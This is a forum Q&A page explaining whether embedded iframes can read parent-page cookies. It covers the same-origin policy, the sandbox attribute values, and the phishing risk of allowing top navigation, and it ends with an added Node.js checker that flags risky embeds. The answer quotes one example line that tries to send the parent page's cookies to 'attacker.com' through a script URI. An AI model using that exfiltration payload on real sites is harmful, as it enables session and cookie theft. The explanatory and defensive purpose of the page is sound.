How can I confirm that embedded iframe cookies are readable from the parent?

1.2K    Asked by AmitSinha in SQL Server, Asked on Dec 24, 2021

Is there a way to confirm that an embedded iframe can read cookies from the parent? 

I went through various articles regarding iframes and saw these lines in one of those - An IFrame (Inline Frame) is an HTML document embedded inside another HTML document on a website. The IFrame HTML element is often used to insert content from another source, such as an advertisement, into a Web page.

Answered by Andrew Jenkins

First thing to note is that iframe cookies (by default) don't act like they're part of the same origin, unless they are. If the iframe origin (in the src attribute) and the parent origin differ, the iframe will always be sandboxed from the parent. This imposes a bunch of restrictions, like being just unable to access most properties of the window.parent object.

You can make a same-origin iframe have the same kinds of restrictions as cross-origin iframes[1] by using the sandbox attribute. The values of the sandbox are exceptions to the sandbox attribute, not to the iframe security model in general. Thus, allow-same-origin doesn't make a cross-origin iframe act like it's same-origin to the parent page; it merely lets a same-origin iframe do the same-origin stuff that it could have done if it weren't sandboxed. If the parent and iframe are cross-origin, no amount of allow-same-origin or allow-top-navigation will fix that.

For iframes that are actually same-origin and are either not sandboxed or have the allow-same-origin sandbox attribute value, window.parent.[removed] will let you set or read (non-HttpOnly) cookies.

One approach that you might expect to work cross-origin is top navigation. Even cross-origin iframes can, if not sandboxed (or if the sandbox has allow-top-navigation), set (but not get) the URL of their parent. You might think this would let you do something like this: parent.location.href="[removed][removed].href='https://attacker.com/?cookie=' + [removed]" If that succeeded, it would execute javascript in the context of the parent page, and exfiltrate that page's (non-HttpOnly) cookies.

Fortunately, browser developers are wise to that sort of trick. An iframe (that is allowed top navigation) can point to the top page at many things, but a [removed] URI is not one of them.

Allowing untrusted iframes to do top navigation is still dangerous, of course. They may not be able to leverage it to inject scripts or steal cookies (not without an injection vulnerability, such as an XSS), but they can do things like navigate the user to a look-alike URL that displays the same content but is actually a phishing site, for example.

Of course, that doesn't exfiltrate the cookies, merely reveal that they're readable, but it's a way to exploit allow-top-navigation.

And then some; the more extreme restrictions are stricter than the default cross-origin restrictions. This means that sandboxing cross-origin iframes isn't necessarily redundant. For example, cross-origin iframes are by default allowed most forms of top navigation and running scripts that don't try to interact with the window.parent object, but you can block those with sandboxing.
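As an added example, not part of the original answer, the rules described above (origin comparison, the sandbox attribute, allow-same-origin and allow-top-navigation) are modelled as a small Node.js checker a reviewer can run over planned embeds before shipping them. It assumes the cookie access in question is script access through window.parent.document.cookie, so it also requires allow-scripts when a sandbox is present; the parent/frame URLs are constructed samples.

```javascript
// Added example: evaluates what an <iframe> embed permits, following the
// answer's rules. Plain Node.js; the built-in URL class parses origins.

// Origin = scheme + host + port. URL normalises default ports to "".
function sameOrigin(a, b) {
  const ua = new URL(a), ub = new URL(b);
  return ua.protocol === ub.protocol && ua.hostname === ub.hostname && ua.port === ub.port;
}

// null means the sandbox attribute is absent (no sandboxing at all);
// otherwise a Set of the space-separated tokens.
function parseSandbox(attr) {
  if (attr === null || attr === undefined) return null;
  return new Set(attr.trim().split(/\s+/).filter(Boolean));
}

function assessIframe(parentUrl, frameSrc, sandboxAttr) {
  const origins = sameOrigin(parentUrl, frameSrc);
  const sb = parseSandbox(sandboxAttr);
  const canRunScripts = sb === null || sb.has('allow-scripts');
  // Same-origin access to window.parent needs a same-origin frame that is
  // unsandboxed or granted allow-same-origin; the token never upgrades a
  // cross-origin frame.
  const parentAccessible = origins && (sb === null || sb.has('allow-same-origin'));
  // Assumption: reading document.cookie on the parent is done from script,
  // which a sandboxed frame cannot run without allow-scripts.
  const canReadParentCookies = parentAccessible && canRunScripts;
  // Top navigation is allowed even cross-origin unless the sandbox withholds it.
  const canNavigateTop = sb === null || sb.has('allow-top-navigation');
  return { sameOrigin: origins, canRunScripts, canReadParentCookies, canNavigateTop };
}

// Flags the configurations the answer calls out as risky.
function reviewEmbed(parentUrl, frameSrc, sandboxAttr) {
  const a = assessIframe(parentUrl, frameSrc, sandboxAttr);
  const findings = [];
  if (a.canReadParentCookies) findings.push('frame can read/set parent non-HttpOnly cookies');
  if (!a.sameOrigin && a.canNavigateTop) findings.push('untrusted frame may navigate top to a look-alike URL');
  return findings;
}

// Constructed sample embeds (hostnames are placeholders).
const SAMPLE_EMBEDS = [
  ['https://shop.example/cart', 'https://ads.example.net/banner', null],
  ['https://shop.example/cart', 'https://ads.example.net/banner', 'allow-scripts'],
  ['https://shop.example/cart', 'https://shop.example/widget', 'allow-scripts allow-same-origin'],
];
for (const [p, f, s] of SAMPLE_EMBEDS) console.log(f, s, reviewEmbed(p, f, s));
```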
